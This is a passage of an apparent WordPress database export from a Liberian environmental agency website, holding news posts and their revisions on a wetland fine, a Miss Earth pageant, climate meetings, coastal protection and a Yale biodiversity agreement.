is hereby mandated to pay all required costs for ensuring implementation of this \"restoration order,\" the EPA said in the notice of restoration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;The commencement of the restoration order begins upon the date of receipt of the communication and mandates that Sino Liberia Investment takes the necessary action in keeping with the time stipulated as provided by this order, consistent with the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, environmental inspectors reserve the right to monitor the implementation of this order in keeping with Section 95 of the EPML and Section 21 of the EPA Act, and by the same token, such power will be granted to officers of the Liberia National Police to ensure enforcement and compliance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA has mandated Sino Liberia Investment to pay 43 percent or US$ 15,050.00 of the US$ 35, 000.000 fine into government revenue at the Liberia Revenue Authority (LRA) while the remaining 57% or US$19,950.00 shall be paid to the Agency’s account at ECOBANK LIBERIA to cover for the cost of monitoring the restoration of the wetland.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company is asked to present an official receipt of payment to the EPA within 72 hours as of the receipt of the letter.</p>\n<!-- /wp:paragraph -->','EPA Fines Sino Liberia US$ 35,000 for Backfilling Marshall Wetland','','publish','open','open','','epa-fines-sino-liberia-us-35000-for-backfilling-marshall-wetland','','','2023-02-09 11:40:41','2023-02-09 11:40:41','',0,'https://ekmsliberia.info/?p=5276',89,'post','',0),(5277,42,'2023-02-09 11:37:36','2023-02-09 11:37:36','','wetland','','inherit','open','closed','','wetland','','','2023-02-09 11:37:36','2023-02-09 11:37:36','',5276,'https://ekmsliberia.info/wp-content/uploads/2023/02/wetland.jpg',0,'attachment','image/jpeg',0),(5278,42,'2023-02-09 11:40:34','2023-02-09 11:40:34','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has fined Sino Liberia Investment US$ 35,000 for grossly violating the Environmental Protection and Management Law (EPML) of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sino Liberia Investment was found liable for backfilling the Marshall Wetland in Schieffelin, Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Marshall Wetland is one of Liberia’s wetlands of international importance under the RAMSAR Convention, which seeks to protect wetlands ecosystems worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, the unauthorized backfilling of the Marshall Wetland undermines Liberia’s commitment as a party to the RAMSAR Convention by ensuring sustainable wetland protection and violates section 75 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a notice to Sino Liberia Investment dated January 30, 2023, the EPA said commencing a project without authorization from the EPA is contrary to Part III, Section 6 of the EPML, and Section 38 of the Environmental Protection Agency Act.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Recently, the EPA temporarily halted Sino Liberia Investment operation for the violation, but the company violated the halt order by damaging the barrier tape erected by environmental inspectors and continuing the construction of a concrete fence within the wetland, amounting to a violation of Section 95, Subsection 3 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In view of the above counts of violations, the management of Sino Liberia Investment is hereby served with this environmental \"restoration order\" in keeping with Sections 90, and 91 of the EPML as well as Section 38 of the EPA Act.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA mandates that within 21 days, Sino Liberia shall remediate and prevent further harm to the environment by stopping the backfilling and construction of the fence in the wetland.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company is also mandated to develop and submit an environmental restoration plan for approval through a third-party independent environmental consulting firm and prohibit further degradation and pollution of the Marshall Wetland.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sino Liberia Investment is mandated to ensure the full restoration and reclamation of the degraded and polluted wetland ecosystem, and the requirements for the development and implementation of this \"restoration order\" shall be consistent with Sections 90 and 91 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The Management of Sino Liberia Investment Quarry is hereby mandated to pay all required costs for ensuring implementation of this \"restoration order,\" the EPA said in the notice of restoration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;The commencement of the restoration order begins upon the date of receipt of the communication and mandates that Sino Liberia Investment takes the necessary action in keeping with the time stipulated as provided by this order, consistent with the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, environmental inspectors reserve the right to monitor the implementation of this order in keeping with Section 95 of the EPML and Section 21 of the EPA Act, and by the same token, such power will be granted to officers of the Liberia National Police to ensure enforcement and compliance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA has mandated Sino Liberia Investment to pay 43 percent or US$ 15,050.00 of the US$ 35, 000.000 fine into government revenue at the Liberia Revenue Authority (LRA) while the remaining 57% or US$19,950.00 shall be paid to the Agency’s account at ECOBANK LIBERIA to cover for the cost of monitoring the restoration of the wetland.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company is asked to present an official receipt of payment to the EPA within 72 hours as of the receipt of the letter.</p>\n<!-- /wp:paragraph -->','EPA Fines Sino Liberia US$ 35,000 for Backfilling Marshall Wetland','','inherit','closed','closed','','5276-revision-v1','','','2023-02-09 11:40:34','2023-02-09 11:40:34','',5276,'https://ekmsliberia.info/?p=5278',0,'revision','',0),(5280,42,'2023-02-15 09:54:00','2023-02-15 09:54:00','<!-- wp:paragraph -->\n<p>Ahead of the pre-launch of the 5<sup>th</sup> edition of Miss Earth Liberia on Saturday, 18 February in Gbarnga, Bong County, 13 gorgeous contestants representing various elements were on Tuesday, 14 February 2023 unveiled at a ceremony held at D. Calabash, Congo Town.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The unveiling ceremony attracted some officials from the Environmental Protection Agency (EPA) and La Queen Entertainment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Annually, the pageant is co-hosted by the EPA and La Queen Entertainment, a non-political entertainer established in 2018 by former Miss Liberia, Wokie Kou Dolo to promote arts and entertainment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Miss Earth Liberia advocates for environmental awareness, conservation, and social responsibility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reigning titleholders work with the EPA to promote specific projects, especially projects dedicated to addressing environmental and other global challenges like climate change through awareness, tree planting activities, street campaigns, cleanups, and speaking engagements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the unveiling ceremony, Miss Dolo said the event was intended to officially present the contestants to authorities of the EPA and by extension to the public.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She disclosed that La Queen Entertainment has been overwhelmed with the number of young ladies expressing interest in the show, as 20 gorgeous ladies applied to participate in the 2023 edition of the pageant.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to her, following vigorous scrutiny 13 candidates were selected for the pre-launch, which is scheduled for Saturday in Gbarnga, Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Miss Dolo disclosed that there would be the elimination of contestants who failed to perform, noting we believe in “quality not quantity”. &nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The 13 contestants are Princess K. Dolo, Goddess of Light; Salafana G. Scott, Goddess of Fire; Jamesetta P. Wongbeh, Goddess of Water; Veronica McGill, Goddess of Rainbow; Priscilla Q. Crabbe, Goddess of Stars; Cassandra Y. Peters, Goddess of Flower; and Gandemere N. Kolnagbayan Goddess of Air.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Others are Rejoice E. Hunter, Goddess of Time; Tyra G. Manigan, Goddess of Sun; Ruth S. Baysah, Goddess of Moon; Mercy Y. Butty, Goddess of Plant; Famata F. Kromah, Goddess of Tears; and Joward T. Sayon Goddess of Heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The contestants were provided the opportunity to introduce themselves and explained the element they represent.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Following, the showcasing of their various elements, officials of the EPA provided feedback, which was not encouraging.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For instance, John Jallah, manager for Compliance and Enforcement cautioned the contestants against memorizing literature relative to their elements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Manager Jallah explained that the contestants are playing important roles, noting that the earth’s system has been altered by human activities. He made specific reference to the earthquake in Syria and Turkey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Angelo D. George, chief of staff in the office of the Executive Director also stressed the need to contestants to familiarize themselves with the materials, while Comptroller, Elizabeth P. Hoggard asked the contestants to gain confidence in themselves and in what they do if they must succeed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Chris B. Kabah, manager for Planning and Policy said it was important for the contestants to read more since many of them don’t have a background in the sciences.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed the need for them to place emphasis on environmental protection management and capture what is happening at the EPA under Prof. Wilson K. Tarpeh.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Jeremiah Sokan, head of the National Climate Change Secretarial lauded La Queen Entertainment. He disclosed that the platform offers a great opportunity and provides exposure and a network that will beneficial to the contestants.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He asked them to properly position themselves and go for what they believed in and encouraged them to be critical and selective about the words they use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Manager for Administration, Josephine Doles encouraged the contestants they can do it. “She said this is your space. You decided to be in this space. You can make it.”&nbsp; &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Deputy Executive Director, Dobayou didn’t mince his words when he said the “contestants performed half empty.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He buttressed what other staff said about the need for contestants to read more and familiarize themselves with the elements they represent so that they can be specific and not generic.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou also encouraged the contestants to correlate their elements with their advocacies and prepared themselves so that they cannot be distracted.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed the need for contestants to be time conscience, provide accurate data and walk on stage majestically as royals. Dobayou is hopeful that this year’s pageant will be more competitive.</p>\n<!-- /wp:paragraph -->','Miss Earth 2023 Contestants Unveiled Ahead of Pre-Launch in Gbarnga','','publish','open','open','','miss-earth-2023-contestants-unveiled-ahead-of-pre-launch-in-gbarnga','','','2023-02-21 10:00:42','2023-02-21 10:00:42','',0,'https://ekmsliberia.info/?p=5280',88,'post','',0),(5281,42,'2023-02-21 09:59:22','2023-02-21 09:59:22','','missearth','','inherit','open','closed','','missearth','','','2023-02-21 09:59:22','2023-02-21 09:59:22','',5280,'https://ekmsliberia.info/wp-content/uploads/2023/02/missearth.jpg',0,'attachment','image/jpeg',0),(5282,42,'2023-02-21 10:00:36','2023-02-21 10:00:36','<!-- wp:paragraph -->\n<p>Ahead of the pre-launch of the 5<sup>th</sup> edition of Miss Earth Liberia on Saturday, 18 February in Gbarnga, Bong County, 13 gorgeous contestants representing various elements were on Tuesday, 14 February 2023 unveiled at a ceremony held at D. Calabash, Congo Town.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The unveiling ceremony attracted some officials from the Environmental Protection Agency (EPA) and La Queen Entertainment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Annually, the pageant is co-hosted by the EPA and La Queen Entertainment, a non-political entertainer established in 2018 by former Miss Liberia, Wokie Kou Dolo to promote arts and entertainment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Miss Earth Liberia advocates for environmental awareness, conservation, and social responsibility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reigning titleholders work with the EPA to promote specific projects, especially projects dedicated to addressing environmental and other global challenges like climate change through awareness, tree planting activities, street campaigns, cleanups, and speaking engagements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the unveiling ceremony, Miss Dolo said the event was intended to officially present the contestants to authorities of the EPA and by extension to the public.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She disclosed that La Queen Entertainment has been overwhelmed with the number of young ladies expressing interest in the show, as 20 gorgeous ladies applied to participate in the 2023 edition of the pageant.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to her, following vigorous scrutiny 13 candidates were selected for the pre-launch, which is scheduled for Saturday in Gbarnga, Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Miss Dolo disclosed that there would be the elimination of contestants who failed to perform, noting we believe in “quality not quantity”. &nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The 13 contestants are Princess K. Dolo, Goddess of Light; Salafana G. Scott, Goddess of Fire; Jamesetta P. Wongbeh, Goddess of Water; Veronica McGill, Goddess of Rainbow; Priscilla Q. Crabbe, Goddess of Stars; Cassandra Y. Peters, Goddess of Flower; and Gandemere N. Kolnagbayan Goddess of Air.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Others are Rejoice E. Hunter, Goddess of Time; Tyra G. Manigan, Goddess of Sun; Ruth S. Baysah, Goddess of Moon; Mercy Y. Butty, Goddess of Plant; Famata F. Kromah, Goddess of Tears; and Joward T. Sayon Goddess of Heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The contestants were provided the opportunity to introduce themselves and explained the element they represent.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Following, the showcasing of their various elements, officials of the EPA provided feedback, which was not encouraging.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For instance, John Jallah, manager for Compliance and Enforcement cautioned the contestants against memorizing literature relative to their elements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Manager Jallah explained that the contestants are playing important roles, noting that the earth’s system has been altered by human activities. He made specific reference to the earthquake in Syria and Turkey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Angelo D. George, chief of staff in the office of the Executive Director also stressed the need to contestants to familiarize themselves with the materials, while Comptroller, Elizabeth P. Hoggard asked the contestants to gain confidence in themselves and in what they do if they must succeed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Chris B. Kabah, manager for Planning and Policy said it was important for the contestants to read more since many of them don’t have a background in the sciences.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed the need for them to place emphasis on environmental protection management and capture what is happening at the EPA under Prof. Wilson K. Tarpeh.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Jeremiah Sokan, head of the National Climate Change Secretarial lauded La Queen Entertainment. He disclosed that the platform offers a great opportunity and provides exposure and a network that will beneficial to the contestants.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He asked them to properly position themselves and go for what they believed in and encouraged them to be critical and selective about the words they use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Manager for Administration, Josephine Doles encouraged the contestants they can do it. “She said this is your space. You decided to be in this space. You can make it.”&nbsp; &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Deputy Executive Director, Dobayou didn’t mince his words when he said the “contestants performed half empty.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He buttressed what other staff said about the need for contestants to read more and familiarize themselves with the elements they represent so that they can be specific and not generic.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou also encouraged the contestants to correlate their elements with their advocacies and prepared themselves so that they cannot be distracted.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed the need for contestants to be time conscience, provide accurate data and walk on stage majestically as royals. Dobayou is hopeful that this year’s pageant will be more competitive.</p>\n<!-- /wp:paragraph -->','Miss Earth 2023 Contestants Unveiled Ahead of Pre-Launch in Gbarnga','','inherit','closed','closed','','5280-revision-v1','','','2023-02-21 10:00:36','2023-02-21 10:00:36','',5280,'https://ekmsliberia.info/?p=5282',0,'revision','',0),(5285,38,'2023-03-18 06:13:49','2023-03-18 06:13:49','As part of its mandate under Part Il Section 6 of the Environmental Protection Agency Act and Part IV Section 49 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation. These guidelines are intended for person(s), companies and other stake holders involved in any act of importation, handling, transportation and storage of chemicals (agrochemicals, explosives, laboratory, industrial chemicals, petrochemicals and additives) into Liberia. These guidelines are for obtaining license to import, handle, transport and store chemicals in Liberia. These guidelines prohibits the importation of chemicals restricted under international conventions to which Liberia is a state party.','EPA\'s GUIDELINES FOR THE IMPORTATION, HANDLING, TRANSPORTATION AND STORAGE OF CHEMICALS IN LIBERIA','','inherit','closed','closed','','4556-autosave-v1','','','2023-03-18 06:13:49','2023-03-18 06:13:49','',4556,'https://ekmsliberia.info/?p=5285',0,'revision','',0),(5286,38,'2023-03-18 06:14:58','2023-03-18 06:14:58','','Chemical Guidelines original','','inherit','open','closed','','chemical-guidelines-original','','','2023-03-18 06:14:58','2023-03-18 06:14:58','',4556,'https://ekmsliberia.info/wp-content/uploads/2022/01/Chemical-Guidelines-original.pdf',0,'attachment','application/pdf',0),(5287,38,'2023-03-18 06:18:09','2023-03-18 06:18:09','As part of its mandate under Part Il Section 6 of the Environmental Protection Agency Act and Part IV Section 49 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation. These guidelines are intended for person(s), companies and other stake holders involved in any act of importation, handling, transportation and storage of chemicals (agrochemicals, explosives, laboratory, industrial chemicals, petrochemicals and additives) into Liberia. These guidelines are for obtaining license to import, handle, transport and store chemicals in Liberia. These guidelines prohibits the importation of chemicals restricted under international conventions to which Liberia is a state party.','EPA\'s GUIDELINES FOR THE IMPORTATION, HANDLING, TRANSPORTATION AND STORAGE OF CHEMICALS IN LIBERIA','','inherit','closed','closed','','4556-revision-v1','','','2023-03-18 06:18:09','2023-03-18 06:18:09','',4556,'https://ekmsliberia.info/?p=5287',0,'revision','',0),(5289,42,'2023-02-21 10:43:00','2023-02-21 10:43:00','<!-- wp:paragraph -->\n<p>The purpose of the meeting was to establish the National Technical Expert group that would support the compilation of the Green House Gas (GHG) inventory and the development of the chapters within the Biannual Transparency Report and the 3rd National Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The specific outcomes include the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· <a></a> Formulate the technical expert group.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· Socialize the terms of reference of the TEG</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· Review the detailed BTR/NC3 workplan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· Evaluate the challenges and progress from the previous BUR/NC2 reporting.</p>\n<!-- /wp:paragraph -->','The  Environmental Protection Agency of Liberia (EPA) Held a One-Day Technical Expert Group Meeting at the Corina Hotel','','publish','open','closed','','the-environmental-protection-agency-of-liberia-epa-held-a-one-day-technical-expert-group-meeting-at-the-corina-hotel','','','2023-03-22 10:45:28','2023-03-22 10:45:28','',0,'https://ekmsliberia.info/?p=5289',87,'post','',0),(5290,42,'2023-03-22 10:45:03','2023-03-22 10:45:03','','332471554_1811021212606400_7499125381429830863_n','','inherit','open','closed','','332471554_1811021212606400_7499125381429830863_n','','','2023-03-22 10:45:03','2023-03-22 10:45:03','',5289,'https://ekmsliberia.info/wp-content/uploads/2023/03/332471554_1811021212606400_7499125381429830863_n.jpg',0,'attachment','image/jpeg',0),(5291,42,'2023-03-22 10:45:26','2023-03-22 10:45:26','<!-- wp:paragraph -->\n<p>The purpose of the meeting was to establish the National Technical Expert group that would support the compilation of the Green House Gas (GHG) inventory and the development of the chapters within the Biannual Transparency Report and the 3rd National Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The specific outcomes include the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· <a></a> Formulate the technical expert group.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· Socialize the terms of reference of the TEG</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· Review the detailed BTR/NC3 workplan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>· Evaluate the challenges and progress from the previous BUR/NC2 reporting.</p>\n<!-- /wp:paragraph -->','The  Environmental Protection Agency of Liberia (EPA) Held a One-Day Technical Expert Group Meeting at the Corina Hotel','','inherit','closed','closed','','5289-revision-v1','','','2023-03-22 10:45:26','2023-03-22 10:45:26','',5289,'https://ekmsliberia.info/?p=5291',0,'revision','',0),(5292,42,'2023-02-24 10:45:00','2023-02-24 10:45:00','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency of Liberia (EPA) has started working on constructing a rock revetment to protect West Point against coastal erosion and storms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Prof. Wilson K. Tarpeh made the disclosure Wednesday, February 23, 2023, when he met with a cross-section of residents of West Point at a meeting intended to raise awareness on climate change impacts and adaptation processes to build the resilience of <a></a>vulnerable communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the Monrovia Metropolitan Coastal Resilience Project (MMCRP), which is co-funded by the Green Climate Fund (GCF), United Nations Development Program (UNDP) and the Government of Liberia is also intended to protect mangroves and strengthen gender-and-climate-sensitive livelihoods in several communities across Montserrado County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The coastal revetment construction will form part of a strategic, cohesive coastal adaptation strategy using an Integrated Coastal Zone Management (ICZM) approach.</p>\n<!-- /wp:paragraph -->','The Government of Liberia through the EPA Held a Meeting with West Point Residents','','publish','open','open','','the-government-of-liberia-through-the-epa-held-a-meeting-with-west-point-residents','','','2023-03-22 10:49:59','2023-03-22 10:49:59','',0,'https://ekmsliberia.info/?p=5292',86,'post','',0),(5293,42,'2023-03-22 10:49:31','2023-03-22 10:49:31','','332310701_2022485421288162_3265954970292180833_n','','inherit','open','closed','','332310701_2022485421288162_3265954970292180833_n','','','2023-03-22 10:49:31','2023-03-22 10:49:31','',5292,'https://ekmsliberia.info/wp-content/uploads/2023/03/332310701_2022485421288162_3265954970292180833_n.jpg',0,'attachment','image/jpeg',0),(5294,42,'2023-03-22 10:49:57','2023-03-22 10:49:57','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency of Liberia (EPA) has started working on constructing a rock revetment to protect West Point against coastal erosion and storms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Prof. Wilson K. Tarpeh made the disclosure Wednesday, February 23, 2023, when he met with a cross-section of residents of West Point at a meeting intended to raise awareness on climate change impacts and adaptation processes to build the resilience of <a></a>vulnerable communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the Monrovia Metropolitan Coastal Resilience Project (MMCRP), which is co-funded by the Green Climate Fund (GCF), United Nations Development Program (UNDP) and the Government of Liberia is also intended to protect mangroves and strengthen gender-and-climate-sensitive livelihoods in several communities across Montserrado County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The coastal revetment construction will form part of a strategic, cohesive coastal adaptation strategy using an Integrated Coastal Zone Management (ICZM) approach.</p>\n<!-- /wp:paragraph -->','The Government of Liberia through the EPA Held a Meeting with West Point Residents','','inherit','closed','closed','','5292-revision-v1','','','2023-03-22 10:49:57','2023-03-22 10:49:57','',5292,'https://ekmsliberia.info/?p=5294',0,'revision','',0),(5295,42,'2023-03-08 10:50:00','2023-03-08 10:50:00','<!-- wp:paragraph -->\n<p>Ahead of the official celebration of World International Women’s Day, the women of Liberia observed the day on 3 March, 2023 with President George M. Weah vowing to champion the empowerment and upliftment of women across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The women from Liberia Environmental Protection Agency (EPA) participated in the celebration, which attracted hundreds of women at the Ellen Johnson-Sirleaf Ministerial Complex in Congo Town.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>International Women Day is celebrated each year on <a></a>March 8, to commemorate and honor women’s accomplishments, raise awareness about gender disparities and discrimination.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Prof. Wilson K. Tarpeh and Deputy Executive Director, Randall M. Dobayou join the entire workforce to say Happy International Women’s Day to these beautiful and hardworking women of the EPA.</p>\n<!-- /wp:paragraph -->','Women from the EPA Celebrate International Women\'s Day Ahead of Official Celebration at the Ministerial Complex','','publish','open','open','','women-from-the-epa-celebrate-international-womens-day-ahead-of-official-celebration-at-the-ministerial-complex','','','2023-03-22 10:54:09','2023-03-22 10:54:09','',0,'https://ekmsliberia.info/?p=5295',85,'post','',0),(5296,42,'2023-03-22 10:53:29','2023-03-22 10:53:29','','334937542_1212636702726537_3363107298960902255_n','','inherit','open','closed','','334937542_1212636702726537_3363107298960902255_n','','','2023-03-22 10:53:29','2023-03-22 10:53:29','',5295,'https://ekmsliberia.info/wp-content/uploads/2023/03/334937542_1212636702726537_3363107298960902255_n.jpg',0,'attachment','image/jpeg',0),(5297,42,'2023-03-22 10:54:06','2023-03-22 10:54:06','<!-- wp:paragraph -->\n<p>Ahead of the official celebration of World International Women’s Day, the women of Liberia observed the day on 3 March, 2023 with President George M. Weah vowing to champion the empowerment and upliftment of women across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The women from Liberia Environmental Protection Agency (EPA) participated in the celebration, which attracted hundreds of women at the Ellen Johnson-Sirleaf Ministerial Complex in Congo Town.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>International Women Day is celebrated each year on <a></a>March 8, to commemorate and honor women’s accomplishments, raise awareness about gender disparities and discrimination.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Prof. Wilson K. Tarpeh and Deputy Executive Director, Randall M. Dobayou join the entire workforce to say Happy International Women’s Day to these beautiful and hardworking women of the EPA.</p>\n<!-- /wp:paragraph -->','Women from the EPA Celebrate International Women\'s Day Ahead of Official Celebration at the Ministerial Complex','','inherit','closed','closed','','5295-revision-v1','','','2023-03-22 10:54:06','2023-03-22 10:54:06','',5295,'https://ekmsliberia.info/?p=5297',0,'revision','',0),(5298,42,'2023-03-18 10:56:00','2023-03-18 10:56:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia and the Yale Center for Biodiversity and Global Change, Yale University have entered a three-year renewable pact for the development of a national species observation and planning system for biodiversity conservation in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Memorandum of Understanding (MOU) was signed on 12, February 2023, by Prof. Wilson K. Tarpeh, executive director of the EPA, and Dr. Alexander Killion, managing director of Yale Center for Biodiversity and Global Change for their respective institutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the MOU, the EPA and Yale agreed to collaborate to develop a national species observation system and <img width=\"5\" height=\"2\" src=\"\">online geo-spatial dashboard for species-specific conservation planning at local, <img width=\"0\" height=\"0\" src=\"\">landscape, and national scales.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They agreed to meet in person regularly, with the first meeting to take place at EPA headquarters at the earliest convenience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the MOU, Yale will develop a geo-spatial observation system to integrate species field observations with ‘Map of Life’ distribution models to improve conservation planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In doing so, the parties will co-develop a national sampling protocol with existing EPA staff and partners in the field,” the MOU stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was also agreed that Yale Center for Biodiversity and Global Change develop a species-specific interactive map using these data to inform species conservation at the local landscape, and national scales.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This, according to the MOU will include reporting of species Habitat Index, Species Protection Index, and species Information Index.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This observation system will also prioritize where to implement future conservation efforts, including the establishment of new protected areas. Primary field data will not be shared with outside actors unless formally approved by the EPA,” The MOU indicated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Parties to the MOU also agreed that management meetings for planning and evaluation be done at least twice <img src=\"\" width=\"0\" height=\"0\">per year while parties will have larger team meetings quarterly to report on and improve project implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These meetings will include training for EPA staff to manage <img src=\"\" width=\"0\" height=\"0\">and use the observation system and the development of research 